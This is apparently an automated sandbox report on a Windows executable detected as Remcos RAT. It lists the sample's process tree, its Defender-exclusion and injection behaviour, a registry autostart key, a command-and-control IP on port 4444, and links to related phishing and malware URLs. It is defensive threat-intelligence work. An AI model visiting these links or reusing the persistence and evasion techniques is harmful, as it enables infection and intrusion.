PowerShell Module 20->122 27 conhost.exe 20->27         started        92 C:\ProgramData\Microsoft\...\Report.wer, Unicode 22->92 dropped signatures9 process10 signatures11 132 Multi AV Scanner detection for dropped file 24->132 134 Machine Learning detection for dropped file 24->134 136 Adds a directory exclusion to Windows Defender 24->136 138 Injects a PE file into a foreign processes 24->138 29 graias.exe 24->29         started        34 powershell.exe 24->34         started        36 WerFault.exe 24->36         started        process12 dnsIp13 114 185.234.72.215, 4444, 49734 COMBAHTONcombahtonGmbHDE United Kingdom 29->114 116 geoplugin.net 178.237.33.50, 49737, 80 ATOM86-ASATOM86NL Netherlands 29->116 96 C:\ProgramData\graias\logs.dat, data 29->96 dropped 148 Detected Remcos RAT 29->148 150 Writes to foreign memory regions 29->150 152 Maps a DLL or memory area into another process 29->152 154 Installs a global keyboard hook 29->154 38 svchost.exe 29->38         started        40 svchost.exe 29->40         started        42 svchost.exe 29->42         started        48 23 other processes 29->48 156 Loading BitLocker PowerShell Module 34->156 44 conhost.exe 34->44         started        46 WmiPrvSE.exe 34->46         started        file14 signatures15 process16 process17 50 chrome.exe 38->50         started        53 chrome.exe 38->53         started        55 chrome.exe 40->55         started        57 chrome.exe 40->57         started        59 chrome.exe 42->59         started        61 chrome.exe 42->61         started        63 chrome.exe 48->63         started        65 chrome.exe 48->65         started        67 42 other processes 48->67 dnsIp18 104 192.168.2.4, 138, 443, 4444 unknown unknown 50->104 106 239.255.255.250 unknown Reserved 50->106 69 chrome.exe 50->69         started        72 chrome.exe 53->72         started        74 chrome.exe 55->74         started        76 chrome.exe 57->76         started        78 chrome.exe 59->78         started        80 chrome.exe 61->80         started        82 chrome.exe 63->82         started        84 chrome.exe 65->84         started        86 41 other processes 67->86 process19 dnsIp20 108 s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 50605, 50623 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 69->108 110 142.250.186.164, 443, 50477, 50584 GOOGLEUS United States 69->110 112 11 other IPs or domains 69->112

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                4XYAW8PbZH.exe60%VirustotalBrowse
                4XYAW8PbZH.exe68%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                4XYAW8PbZH.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Graias\graias.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Graias\graias.exe68%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db7250%Avira URL Cloudsafe
                https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		high
                  s-part-0017.t-0009.t-msedge.net
                  		13.107.246.45
                  		truefalse
                    		high
                    www.google.com
                    		142.250.186.68
                    		truefalse
                      		high
                      s-part-0039.t-0009.t-msedge.net
                      		13.107.246.67
                      		truefalse
                        		high
                        s-part-0032.t-0009.t-msedge.net
                        		13.107.246.60
                        		truefalse
                          		high
                          js.monitor.azure.com
                          		unknown
                          		unknownfalse
                            		high
                            mdec.nelreports.net
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                		high
                                http://geoplugin.net/json.gpfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_283.17.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designersG4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bThe4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers?4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_283.17.drfalse
                                            		high
                                            https://www.linkedin.com/cws/share?url=$chromecache_316.17.dr, chromecache_296.17.drfalse
                                              		high
                                              http://geoplugin.net/json.gp2graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.tiro.com4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.kr4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/Youssef1313chromecache_283.17.drfalse
                                                        		high
                                                        https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_316.17.dr, chromecache_296.17.drfalse
                                                          		high
                                                          https://aka.ms/msignite_docs_bannerchromecache_316.17.dr, chromecache_296.17.drfalse
                                                            		high
                                                            https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_296.17.drfalse
                                                              		high
                                                              http://polymer.github.io/AUTHORS.txtchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                		high
                                                                https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_283.17.drfalse
                                                                  		high
                                                                  http://www.sajatypeworks.com4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.typography.netD4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.founder.com.cn/cn/cThe4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.galapagosdesign.com/staff/dennis.htm4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_316.17.dr, chromecache_296.17.drfalse
                                                                            		high
                                                                            https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_283.17.drfalse
                                                                              		high
                                                                              http://geoplugin.net/json.gp/C4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://aka.ms/pshelpmechoosechromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                  		high
                                                                                  https://aka.ms/feedback/report?space=61chromecache_283.17.drfalse
                                                                                    		high
                                                                                    http://www.galapagosdesign.com/DPlease4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://learn-video.azurefd.net/vod/playerchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                        		high
                                                                                        http://www.fonts.com4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sandoll.co.kr4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://twitter.com/intent/tweet?original_referer=$chromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                              		high
                                                                                              https://github.com/gewarrenchromecache_283.17.drfalse
                                                                                                		high
                                                                                                http://www.urwpp.deDPlease4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.zhongyicts.com.cn4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4XYAW8PbZH.exe, 00000000.00000002.1831640723.0000000002911000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000008.00000002.1856673299.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sakkal.com4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_283.17.drfalse
                                                                                                            		high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.04XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_283.17.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                  		high
                                                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                    		high
                                                                                                                    https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                      		high
                                                                                                                      https://github.com/Thrakachromecache_283.17.drfalse
                                                                                                                        		high
                                                                                                                        http://polymer.github.io/PATENTS.txtchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                          		high
                                                                                                                          https://aka.ms/certhelpchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                            		high
                                                                                                                            http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                              		high
                                                                                                                              https://github.com/mairawchromecache_283.17.drfalse
                                                                                                                                		high
                                                                                                                                https://schema.orgchromecache_296.17.drfalse
                                                                                                                                  		high
                                                                                                                                  http://polymer.github.io/LICENSE.txtchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                    		high
                                                                                                                                    http://geoplugin.net/json.gpSystem32graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://aka.ms/yourcaliforniaprivacychoiceschromecache_283.17.drfalse
                                                                                                                                        		high
                                                                                                                                        http://geoplugin.net/json.gp~graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.carterandcone.coml4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://github.com/nschonnichromecache_283.17.drfalse
                                                                                                                                              		high
                                                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlN4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.founder.com.cn/cn4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.fontbureau.com/designers/frere-user.html4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/adegeochromecache_283.17.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.jiyu-kobo.co.jp/4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://github.com/jonschlinkert/is-plain-objectchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://octokit.github.io/rest.js/#throttlingchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.fontbureau.com/designers84XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://github.com/js-cookie/js-cookiechromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schema.org/Organizationchromecache_283.17.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://channel9.msdn.com/chromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://github.com/dotnet/trychromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                                        		high

                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public IPs

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        142.250.186.68
                                                                                                                                                                        		www.google.comUnited States
                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                        13.107.246.60
                                                                                                                                                                        		s-part-0032.t-0009.t-msedge.netUnited States
                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                        239.255.255.250
                                                                                                                                                                        		unknownReserved
                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                        142.250.186.164
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                        178.237.33.50
                                                                                                                                                                        		geoplugin.netNetherlands
                                                                                                                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                        185.234.72.215
                                                                                                                                                                        		unknownUnited Kingdom
                                                                                                                                                                        		30823COMBAHTONcombahtonGmbHDEtrue

                                                                                                                                                                        Private

                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.4

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1584203
                                                                                                                                                                        Start date and time:2025-01-04 18:41:03 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 14m 13s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:144
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:4XYAW8PbZH.exe
                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                        Original Sample Name:4A9440BAA61BE8363A372B0BBC5933AD.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@461/91@25/7
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 75%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                                        • Number of executed functions: 126
                                                                                                                                                                        • Number of non-executed functions: 195
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                        Warnings

                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 2.22.50.144, 192.229.221.95, 184.28.89.167, 142.250.186.174, 64.233.166.84, 216.58.206.35, 95.101.150.2, 142.250.185.78, 142.250.184.206, 142.250.185.206, 20.189.173.20, 142.250.74.202, 142.250.186.138, 142.250.186.106, 142.250.186.74, 172.217.16.138, 142.250.185.170, 142.250.185.138, 216.58.206.42, 172.217.18.10, 142.250.185.106, 142.250.184.202, 142.250.186.170, 142.250.181.234, 142.250.186.42, 142.250.185.202, 142.250.185.234, 104.208.16.88, 2.16.168.102, 2.16.168.100, 13.74.129.1, 13.89.179.8, 13.107.21.237, 204.79.197.237, 142.250.181.238, 172.217.18.14, 142.250.185.142, 172.217.23.110, 142.250.186.67, 142.250.185.238, 23.56.254.14, 51.104.15.253, 20.42.65.84, 184.30.230.100, 172.217.16.206, 142.250.185.174, 52.168.112.66, 216.58.206.78, 51.104.15.252, 13.69.116.107, 104.208.16.95, 142.250.185.74, 216.58.212.170, 172.217.16.202, 142.250.184.234, 216.58.212.138, 216.58.206.74, 20.190.160.17, 23.56.254.164, 13.107.246.67, 13.107.246.45, 20.109.210.53
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, onedscolprdcus20.centralus.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, onedscolprdweu09.westeurope.cloudapp.azure.com, update.googleapis.com, onedscolprdeus02.eastus.cloudapp.azure.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, onedscolprduks04.uksouth.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, onedscolprdeus01.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, onedscolprdcus08.centralus.cloudapp.az
                                                                                                                                                                        • Execution Graph export aborted for target graias.exe, PID 7328 because there are no executed function
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        12:41:51API Interceptor1x Sleep call for process: 4XYAW8PbZH.exe modified
                                                                                                                                                                        12:41:53API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                                                                        12:41:54API Interceptor2072771x Sleep call for process: graias.exe modified
                                                                                                                                                                        12:42:09API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                        17:41:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9 "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                        17:42:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9 "C:\Users\user\AppData\Roaming\Graias\graias.exe"

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        239.255.255.250phishingemail.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                          phishingtest.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                            http://livedashboardkit.infoGet hashmaliciousUnknownBrowse
                                                                                                                                                                              iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                      https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                          https://www.copiat.ro/6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            178.237.33.50iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                                                                            13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • www.mimecast.com/Customers/Support/Contact-support/
                                                                                                                                                                                            http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5

                                                                                                                                                                                            Domains

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            s-part-0017.t-0009.t-msedge.netGpuXmm386e.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            yKkpG6xM4S.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            IlPF8gbvGl.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                            https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 13.107.246.45
